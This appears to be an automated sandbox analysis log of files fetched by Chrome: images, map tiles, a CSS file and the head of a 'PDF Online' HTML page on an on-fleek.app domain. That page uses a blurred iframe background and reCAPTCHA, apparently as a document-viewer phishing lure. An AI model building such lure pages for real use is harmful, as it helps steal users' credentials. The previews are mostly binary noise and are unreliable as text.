                                              SHA-256:E1ACF3C98893E9A077CD25B58F434F38743D5EC6BF0477D9A19489497A0880FB
                                              SHA-512:E02D72A2EC531E379B10E5ADC2B1BF3155D7DF62D327CF117CF993BB4D886DBE61F835EA83D193D4262C5D5B84B974E8C5388F884FBAFA1DBE27779582BF9BD9
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/IIM_Calcutta_Logo.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):15064
                                              Entropy (8bit):7.691087878609802
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw6UhxwDNu/LlUiieZcZHr2WtF/WEP6FTk5qwHwooD55hBCNIjgvp6stE:4YNg7NX0WoekiWP/rCywWkbM5vpDtE
                                              MD5:AD6158AF455A77808B6D05FBEA5F275E
                                              SHA1:69AA2D88F33F180286D07264C6F98BE9850419DA
                                              SHA-256:BA759AB2E3D2FBF0B91963845578771B018D7AE4A03C9317BDDCA9962DEC6AB9
                                              SHA-512:936981AA3FB2F6DB0689722679646FD6400A6104CDFB61F389CE60E548EF7D58300D0CB2E3CB481EC3197D3E4E3DB8C92AD6D17C7F156247E92079F0C6AA76DF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/46/095c41b01aa251d2b96d852a126f1158.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):17542
                                              Entropy (8bit):7.984190376442565
                                              Encrypted:false
                                              SSDEEP:384:kwt8o6a4n+mCKg9NP+QXI1IPp60rFQuaKtiJguIobdEdLtWW88:58na4nyD2gLfiJguFs88
                                              MD5:B282A81A125D56B3A08B5986A419D3D5
                                              SHA1:F6DFA0C8509A3ED5AC581AF04958100068EC9665
                                              SHA-256:03D2CA858A279DDC78B49504D2952CD3974B7FDCE96F39FC2C3FD7128595813B
                                              SHA-512:4690E6275E4AE25953AEEF843C1BBCC3720B6F83FD48D6FA4A994A76610AEEA3D6968C0522604F3ACF46B14944C55585422E1A54A276321B6EFE29AD3111B265
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21413!3i14014!4i256!2m3!1e0!2sm!3i707457569!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=63445
                                              Preview:RIFF~D..WEBPVP8LqD../..?.?..D.'8_.P5]...?w.......U....]....,i..W.u.........O....4Z!%..2..3.A..%" K@...Lc....:....D"..D.......H...G.u....g.....;..@F.Z..)...K._@.I.?...Cqv....Q.......:.;WvL.X..c..5.k.W#.L.$..).,. .....H...J..........\V\_S....f....U...'Z.....+X... ..+...P.nm.-..\......#...6;..x|...-f:.gU....&m;%..-...M...'.A.`!...5&..q.Kk2{./......,.}5....8....B.....XZ.N.[..........r/.t..".+o...3....l_....N.s/..NUE._.$.u+...Q... y?...K....=......Q.=..pB...e..W...6__a.v.%.+._l.78...WO7..O~.m.{...Mr?..~.<....Hi...M.z......o.>.....D.7...i...E....R..%.N%b....D....<..P)....O....&..../...w2..J|..m..?.<y.....=.....o?...........m......O...w^.....3:&kFt;d(.M.o/O..R.R1...\.P.o>.N.#.T.n......X....Te.6.O.....x_...0..7.O.......*}....1sz......v..".......Z3h.i..~.Q....3.-'b}...U..7IWw....o...g;Y....qe.oj.z..j.$.6.N.7*2{..{..z..o.v...twA...c.}.....7.....p7o;'w.....J.<..*.@....r.$..RE.v.M..X.}._/."r....r.xz..09M...J:..`.ww.IF7....;.<.~th.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6678
                                              Entropy (8bit):7.946654735519426
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xZSan3FtD81KBZ+qxTLOiBqC7UT0uNJ9lzle:UIIHUCD4wa3SuDPZ+qxTL09jP9ve
                                              MD5:C17E0DF0B21C0930C8C0C84CF8E9C0FC
                                              SHA1:82333F1550F58C65E4CC17DDE47C86038496B40C
                                              SHA-256:1BD2D639F3283BABDAF7500A1447E230A0B64F03AAC99A23F078380D59863E89
                                              SHA-512:6AFAB28AFDC12482213769829B1B400A0C9248C1427BA3989D7813B970D3AFE66A0DE8236350FFB0E3B068CE056D7F8AADA6C3B30D544FFF5FF8798CE0A2B173
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/highnessclinics-logo.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):16206
                                              Entropy (8bit):7.709469914947277
                                              Encrypted:false
                                              SSDEEP:384:4YNg7dfQ8Z8CzNpJG13LXf8WhDC9MEQQ6jOI2z:4Yyh/8YGx8SDC9MEQQsr2z
                                              MD5:BEE552D839CCB41A29EA9DFFF0279829
                                              SHA1:CB2AB4AB7169746FF320AD22FAAF3F423B8F86FC
                                              SHA-256:A417A58DA6CED599BA01C18D00F73609B48C0546F3CAA15F4F4F5F839DB7C435
                                              SHA-512:11D4B86F4500CCF17503E31ACB666D327E96AB052A66CF09B9BB34580633F54B794C1D8F9BA7941F54DC690FB314F2E8A4AE6F55549367F4748C360579379656
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/47/dbbf319564302b618e160f8d125032c5.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):23822
                                              Entropy (8bit):7.98989858786577
                                              Encrypted:false
                                              SSDEEP:384:qLBB2Kqy73eDYdfTCokaCrwHAvoDIP1Slu7YK4DUXK2vYbbNRn3DsIEAUPAa/Bjo:sT2e3MYQnrSDI9mcYbcKbbfdkPAcBj3Y
                                              MD5:4E7AF0F169B339487C34A7C5EF6D3A10
                                              SHA1:64227414304E74EF6D65849274EB5AFF6C6C621D
                                              SHA-256:A6A2A7EE88D81799A1088B004FC9769EC75AD3F40B1758228CB902124C45B6E3
                                              SHA-512:B632738315D7D406026AF1EA25F36B21FEABC5ABF337ACA9225CF255FABB7EF43EA1FF4BC2A7045B2117D41762AF44A7E4F300DC078C2497D52762CA8130D57F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/23/c7a29cc2e7fdcacc9c3f5f4ff3bddd5f.webp
                                              Preview:RIFF.]..WEBPVP8X..............VP8 .\..p....*....>.p.T)&*5"0....g.....y.........f.y........Q.y.o..h....y.t..6*k....fT?4....Bs.....c..../....C*...w............w..?..%..,m..?.N....[..X......w...>.J.|..[*...*..T2..T]a....J(y../?...T2..T]l.d (....l 3..]6...{..K7.n.-..,...i'.....xk"C9. (...b....B.....|.7..p....B.U..Ha.W...vm.Y.{t...=q...v...AmdJ/.....,o..G..-..=.../Vv.JDF..G........vf.W...vm.Y.{t...q..T...F<e.QQu...|.kf.."T...."z....7.WZ.....\.gO>.c .........H.'gEpN..f.%..O..6BL..j.B.vTT]..vTTa@2=..V...Yz..|..*.&.3.pS....M.F..:..&V.\...vm.X.H.'g=.=.....R..f....U..."K. /...../mm.Q.r....K....S.P.L.(F......#..on.VtY..l^.%pE]j5..Mr.s./....s.g.. ..^.... (...V#xM..'6.*./..>.._.n....8|.[..T....:..h.o...?.'.>^...TH...E...../m.'.%P'...B......k...@.T...P6.1?..B...H...'^..m....s...V.a..f./....|8r...U..8[!.....s.&...3.#D.(.....4............;|....I#.%pN..A..8*.~.m-EP.S.J..z%.9..K)..K..oh.a..P9..[o....4}..G.o)...N.M....R...RvtW...c,.=.....,./.D.T2)^|....w..v.....Ofn>r..5
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):14990
                                              Entropy (8bit):7.679955180166905
                                              Encrypted:false
                                              SSDEEP:384:4YNg7r2IKe+DrKCbQwnnX1sGKGQafKkLK:4Yy/mvKCEwnXuZszm
                                              MD5:BEC64E729C731AF035403631057E10FB
                                              SHA1:73814E9A56B0E1FD03A9FAC4E94B15C8CD373ADF
                                              SHA-256:A736F91E40BFA7B2A58829BEBA89539EA88A4BB4FF2D41B5FF7EDEDB4ACCAF48
                                              SHA-512:8DC726FD7C60F2CCB7BAF35E1A5CA0E59DA73B7541118AA5A3846EBA7EAFC435D34C44F788366BDB8CBA65627A8E0637EBDB4E03ED23ED40E0AAAAC3D4605803
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                              Category:downloaded
                                              Size (bytes):8289
                                              Entropy (8bit):4.458492236513255
                                              Encrypted:false
                                              SSDEEP:96:92oFR73XaFWB5PFxMERpYHCvSClrRYr2vOKJTDcE05cjD60k58:pbhB5EEsivLlYrAJTDchKjD6xm
                                              MD5:E75C1BB240DAED6A283807B98B7DB2A4
                                              SHA1:8D19B7512907C1CACC0D2C304D4A0FAC1DF29923
                                              SHA-256:E97962EF1A54B7D8296F229C9B10FC5DB3FA5EF3F6377B0E9587B796DB9C56B6
                                              SHA-512:3338F29E5290177C13F56CDE3FF2577832B8B5D04297246A8C488C2707BA3396C44EDB59F4F467A80839D7947B091525CECFC055B3951408E89A3293AEF0155E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://pdf-online.on-fleek.app/
                                              Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>PDF Online</title>.. <link rel="stylesheet" href="styles.css">.. <script src="https://www.google.com/recaptcha/api.js" async defer></script>.. <style>.. /* General body and html styling */.. html, body {.. margin: 0;.. padding: 0;.. height: 100%;.. overflow: hidden; /* Prevent scrollbars */.. }.... /* Background styling */.. .background {.. position: fixed;.. top: 0;.. left: 0;.. width: 100%;.. height: 100%;.. overflow: hidden;.. z-index: -1; /* Place it behind other content */.. }.... .background iframe {.. width: 100%;.. height: 100%;.. border: none; /* Remove iframe border */.. filter: blur(8px); /* Apply blu
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):14936
                                              Entropy (8bit):7.629623179984029
                                              Encrypted:false
                                              SSDEEP:384:feZ71scef7C3sbsobryiM7wfosB6lQs+toq87:Q++38rTMEosBI+OZ7
                                              MD5:CAC22C887062A2AA88C0FAAB316D529C
                                              SHA1:F8129F496042FBB93A1E2F9367D77808525C58BB
                                              SHA-256:B1E2059D50F0F341BDD471B213DB6BFE3E4424C4954BF1F445DBF9BF5A9C307B
                                              SHA-512:CDCE2D783609620355CEED245335ED5D068389D30B188123F5D1C4CDDA3D26ED38FA8C691462042C9CC0A3D03FDDE72EEE8E8626CE7389B83B0D22BDAA153E5D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/1/a17a60dddb256b8f45b02f9aad2bb631.jpg
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:9D1ECD9C933011ED8FEBE4E937E1C8D8" xmpMM:DocumentID="xmp.did:9D1ECD9D933011ED8FEBE4E937E1C8D8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9D1ECD9A933011ED8FEBE4E937E1C8D8" stRef:documentID="xmp.did:9D1ECD9B933011ED8FEBE4E937E1C8D8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...................%...1;..:V................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:downloaded
                                              Size (bytes):85779
                                              Entropy (8bit):7.987113880360917
                                              Encrypted:false
                                              SSDEEP:1536:TBnHX4liBf1D7LoNvzcVgUXXyYt1cPPcRyThSvqKlOLR:TBHX4ly1fLo14K/6uSCKAR
                                              MD5:DF867CDD9CE765B8379AC145BB7947BC
                                              SHA1:BE0009217C871A788A5639FF0BFD85B5EC23E59D
                                              SHA-256:EF6553EAE2FE07B1586333C8B8409FF8F35F46A251245E1D5F098FCC59C00CD9
                                              SHA-512:91A0184AB8DE50171E9412704C86B6CBA089DE6D838D827096A418122379827F4397014127B4FA44A0034D066E6C36983DFB9A9FAD7D0FCC72AEAA48B00CAF40
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/news/5/49f7ca793fcb324d2166d6e2a915044f.jpg
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."................................................Y....7Y....T...N.......}V.a}s........|...76.z,T..;+...h.m..$....".n.^-u$........"3&0.g,..\../....?s.....G3..>'.......8......1.NP)..b......*.w4..(.&......H51...*Ql.Z..#.g...m8DDF<..g....u|......z/....T.T=.N....c....7c.fW.M.j3.V.m........\.U.L..UK.nUIWSnJ..].....l"8T7..m9..O.Q..._.x..g.y.G.....g3...91...@..["H...vzW....\.7..%U...L.U*.....G.a.......P...nG.gCv......z|..#.....<.<....+..H.....p.v..EW.....Uc..$.....W%J.5.4....p.....>r....y....=.;G...v....;..e[.Y.BJ.Ey4..*"..-.}....\..C.\..O6.RIU%jZtO........L.5..........`.T.U..p{............".X..%m..^....H..UUPR......rJ...5.A}B.vFd.C.........F.W...b.h..x.k. <.N....U..0t..9*\...RK..cN...6..\.c....Uu ...?..#8d.3.>?......s:..W...P.U..|W....:...wHu..s-...l.Rgi]K...C..H..$.P..r.I#..l...2#+
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x750, components 3
                                              Category:downloaded
                                              Size (bytes):465135
                                              Entropy (8bit):7.9865775065261575
                                              Encrypted:false
                                              SSDEEP:12288:aHLDQmOAhW1yD5ndsUz+uA4MdHFNy0/O8xXTH:68e7D5ndOWMdHDmAXT
                                              MD5:32B1CD58F62CFAD85F42E83AF7554F20
                                              SHA1:3EF018A6027AB027B4A5177AC6C71D8A669FE83A
                                              SHA-256:FDBD46BAD8DF1A359F047B3441EE3C51037068750EB380B0EB7A5FEB8EB34D82
                                              SHA-512:83B7DC31D85B688EEA88444ED5B8B2EFA93BB16469DFF91F73E76637F21A6431B477D2991E6DD21169D6193F3F73F01CAFF3F74FF695323113CCD07FC94F080E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/31/4a98fa9bd66caf02803bed595073351f.jpg
                                              Preview:......Exif..II*.................Ducky.......d.....bhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="B3D2AB1016602B7C6B7EEECC2B8EE85A" xmpMM:DocumentID="xmp.did:DC3562EB940D11EDAE93EE0BCB8DB905" xmpMM:InstanceID="xmp.iid:DC3562EA940D11EDAE93EE0BCB8DB905" xmp:CreatorTool="S908EXXU2BVKB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4e1e01a6-f8cf-ab46-8c3e-158dc8be362f" stRef:documentID="xmp.did:4e1e01a6-f8cf-ab46-8c3e-158dc8be362f"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...HPhotoshop 3.0.8BIM..........Z...%G........8BIM.%............x/4b4.Xw....&Adobe.d
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):16984
                                              Entropy (8bit):7.982935730760655
                                              Encrypted:false
                                              SSDEEP:384:6AQncdA+Jd8uGzouNa8FwTIUVwslUeg2/XcK/tVOG:6AQn/gdhCoD8UIU7lUH2/jSG
                                              MD5:80C05DF4740296760EB2223059123ECA
                                              SHA1:617C040388AAA3919173C98309116020274303D0
                                              SHA-256:3D1973B997D5EEA89B6584722D11211AD123B4C56AE7DA2B5D1F27449F8DA050
                                              SHA-512:65BEE85602E1AD76897778B398F178988109F384A8AA4CC7E2E6179E06B4A35A920C047A622B0CAD4D799D98A80C37C7154226D8318046515C79D275AE954FEF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21415!3i14013!4i256!2m3!1e0!2sm!3i707457629!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=46416
                                              Preview:RIFFPB..WEBPVP8LDB../..?.g. .mU...q........tpw......d.6.w...1.v...5'.p[....;..."J..r`.}...t...`.....5G#:..U....*......W.N... D'..&.....,...G.8UW..>*..<E..+..b,p..j.U..$...A.....5.......{q..<....rs+.v...F..";sK.A.../...jh.we.i......,....&.....!.Z...V..{.k"..b..W....~c.....<_\.+... z>..N.x...PH..~3..&..t<..........'..j#[.....K.mp..l...8.l*..Z ........kFy..|...........C."B.L.........D...]..:R..%......./...._.....O?..Uk.>{L1.....F...\O...uW.P.ik.."F.f.Q..#.<....2-...7.).l.h.?&.y..P.]g..Q...s|..x..G.......j.........1<.?..7..c... .3"6-Q..5.^.V:.`.....~..w.9...%...'+L.:....M.hX...D......u..h........C...>;N...dx.4..I...v.%........r.\.:N..q7....K...f.th..x..M$.S...|fL...s....i..tg)..U.N^..w.*.D....:%.rs...1.\{.3.o`o..I....K..{..9.J:D.<<.dXKN..+........w1..>..._E.4.zTR.j.9.q.....7O...j....f.A..+...9.t.%2..B..A....%..:.%.!V.;...'%......v.F.b.a.....h.J<.gB.#.{..I,.w.F.LU.3.G......5.<.._]}f..*.#..C1.X.6.N....3..pY..9.wFY...:..s.f..4<.s......hT.\.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:downloaded
                                              Size (bytes):571445
                                              Entropy (8bit):5.032748742999926
                                              Encrypted:false
                                              SSDEEP:3072:ebCPXwLZbCnrZZ2IUkG6kG7+v9Gn47sdqgV7Z:ebAgFbKj2IUkG6kG7+o47sdqgV9
                                              MD5:E692F65F5DD1EDECCE8C09E3F5D38D1D
                                              SHA1:09B018EC9F88CD25192B053D65FFB03075D00B1D
                                              SHA-256:1767BBED9562DD4AA50B7530F8C8D71666ADB0C6B20C6608057424B0C5B051DA
                                              SHA-512:AB168E1D040338D5B2D7D7846DA355F70DE49912D6684A13E0788055E751348D5F956AC192666A6A068E26B07C9D2F2CCD035216A1A1BB7CAC206B861595D173
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/css/master.css
                                              Preview:@charset "UTF-8";....:root {.. --primary: #003d88;.. --secondary: #2c2c2c;.. --black: #000;.. --black-2: #121212;.. --black-3: #555;.. --black-4: #1d1d1d;.. --black-5: #343434;.. --black-6: #262626;.. --black-13: #666;.. --white: #fff;.. --white-2: #efefef;.. --white-3: #e9e9e9;.. --white-4: #f0f0f0;.. --white-5: #fbfbfb;.. --white-6: #d7d7d7;.. --gray: #c2c2c2;.. --gray-2: #999;.. --gray-3: #a8a8a8;.. --gray-4: #f6f6f6;.. --gray-5: #bbb;.. --gray-6: #2b2b2b;.. --gray-7: #b9b9b9;.. --gray-8: #8E8E8E;.. --gray-9: #aaa;.. --gray-10: #7c7c7c;.. --gray-11: #D9D9D9;.. --gray-12: #383838;.. --gray-13: #ccc;.. --gray-14: #dfdfdf;.. --gray-15: #C0C0C0;.. --pink: #FAEDE9;.. --pink-2: #FF9776;.. --pink-3: #F3ECEC;.. --pink-4: #FFFAF0;.. --pink-5: #E0E3CC;.. --bg-line: #1e1e1e;.. --d-gray: #6A6A6A;.. --d-black: #1A1A1A;.. --d-black-2: #171717;.. --d-black-3: #1A1A1A;..}..../*----------------------------------------*/../* 02. MIXIN CSS START../*------------
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:downloaded
                                              Size (bytes):74953
                                              Entropy (8bit):7.974604668220894
                                              Encrypted:false
                                              SSDEEP:1536:flKpxwFbl3MT/OXZmvmUfNAB6oVCabCHvTWrIyhW8Jk+6XujS2IsOfnN:sEFbKT/OXOABnVPbCP+jhHeXGHryN
                                              MD5:136E7A62F2A4E9FDBCF5790DBF0694CF
                                              SHA1:5AF3462B13491D943344DC840E766C0EF77F2EB7
                                              SHA-256:CC3156924F9E17AF6B8E8887FC6BEFB9BF8BBA22B3EA8F7CACB51DA00A01BC02
                                              SHA-512:9D6A810F5C6BE0D3F0233B1E6BFDBFD64DC37EC71EFCB392E726811EABFE54388FA8567AF360230EBFAF13A3097E4BA5942E45A15B5D7345BAFD8B821229575F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/services/1/3fbdb2fd59d795b1615bcf06b1608459.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:5AC65268934111EDBE40BFEA44351D52" xmpMM:DocumentID="xmp.did:5AC65269934111EDBE40BFEA44351D52"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5AC65266934111EDBE40BFEA44351D52" stRef:documentID="xmp.did:5AC65267934111EDBE40BFEA44351D52"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............5-...d..$...........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65317)
                                              Category:downloaded
                                              Size (bytes):101894
                                              Entropy (8bit):4.781938488094656
                                              Encrypted:false
                                              SSDEEP:1536:ayfMCMPMCMjMCM4MCMwMCM3spL709gbPMfjSFOTyPGu3prfZCC:a6709gMGFiyPGu3pfZCC
                                              MD5:8BB6644125DDEEE7A27732E86F65FA05
                                              SHA1:686E3160CFF3FB1BE2DE10779754B40F15948208
